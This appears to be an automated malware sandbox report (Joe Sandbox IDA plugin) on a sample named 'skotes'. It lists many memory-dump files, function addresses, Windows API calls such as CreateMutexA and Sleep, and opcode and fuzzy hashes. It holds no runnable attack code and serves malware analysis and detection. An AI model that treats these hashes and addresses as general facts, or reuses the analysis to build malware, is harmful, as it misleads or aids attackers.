Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f94a348eee23b709daa052fff5ed2db85839b2396701df853faad82d97190799
Instruction ID: 982c01431d941176154f7be0e50aa8dac4627bbfca2e9d859a18f73de37393f5
Opcode Fuzzy Hash: f94a348eee23b709daa052fff5ed2db85839b2396701df853faad82d97190799
Instruction Fuzzy Hash: 82316A71B041449BEB189B79CD89BDDB762EB81320F24421DE414DB2D5CB398880EB12

Function 00FB9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9a3a9222831d47195cbcc7fa9def6ef0f92c862f2b802f81abe4d9ece9a52b33
Instruction ID: 90a07dfdd74a10a69f0674ae14a55bbd2b8e304921f3d965bc169118ada64679
Opcode Fuzzy Hash: 9a3a9222831d47195cbcc7fa9def6ef0f92c862f2b802f81abe4d9ece9a52b33
Instruction Fuzzy Hash: 1C216E717042419BEB18AB6EDCC9BECF761EBC1320F20421EE418DB2D5D77A8981EB11

Function 00FBA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 07ccc44eab4b8fe2306d7d0f32ae3b44bce1351136d6a63af277e7379d3cef27
Instruction ID: 54e9b63639a07c0a1889a644a4b23264d560f8b16b77a227e270c436417b7d3a
Opcode Fuzzy Hash: 07ccc44eab4b8fe2306d7d0f32ae3b44bce1351136d6a63af277e7379d3cef27
Instruction Fuzzy Hash: C9214871B442019BFB24776BCC9ABEDB651EF81310F20091BE448DA6C1CA7EC881FA53

Function 00FBA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9170ca8a63b228255cb0d90f1eb8549d351ec82a46ca56d9eca7b58538343d56
Instruction ID: a748928b1653320ed5a58d7f494a7270dac32152353369f5095b81b2b9a9aa5a
Opcode Fuzzy Hash: 9170ca8a63b228255cb0d90f1eb8549d351ec82a46ca56d9eca7b58538343d56
Instruction Fuzzy Hash: ED2191717002019BE7189B6EDC897ECB7A1EBC1320F24421EE408DB6D4D77A8580EB12

Non-executed Functions

Function 00FB2EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00FB2F5F
__Mtx_unlock.LIBCPMT ref: 00FB2FCC
__Cnd_broadcast.LIBCPMT ref: 00FB2FE3
__Mtx_unlock.LIBCPMT ref: 00FB30F5
__Mtx_unlock.LIBCPMT ref: 00FB319B

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction ID: f5ee0a315b13735ce78b5442ae3d57aee6f27532b6768a99d802f446fa2a376d
Opcode Fuzzy Hash: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction Fuzzy Hash: 2BA1F371E41206AFDB10EF65CE45BAAB7A8FF14364F04812DE819D7241EB35EA04EBD1

Function 00FECBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FECC66

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: dd05b4bd6bc9a135e851fbdd7a7336a55597385e22180c520d6f357ff6532f2f
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 8FB1F232D042C59FDB25CF2AC881BBEBBA5EF45350F24416AF855EB241D6399D03DBA0

Function 00FCBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00FCBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBBE4
_xtime_get.LIBCPMT ref: 00FCBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBC13

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
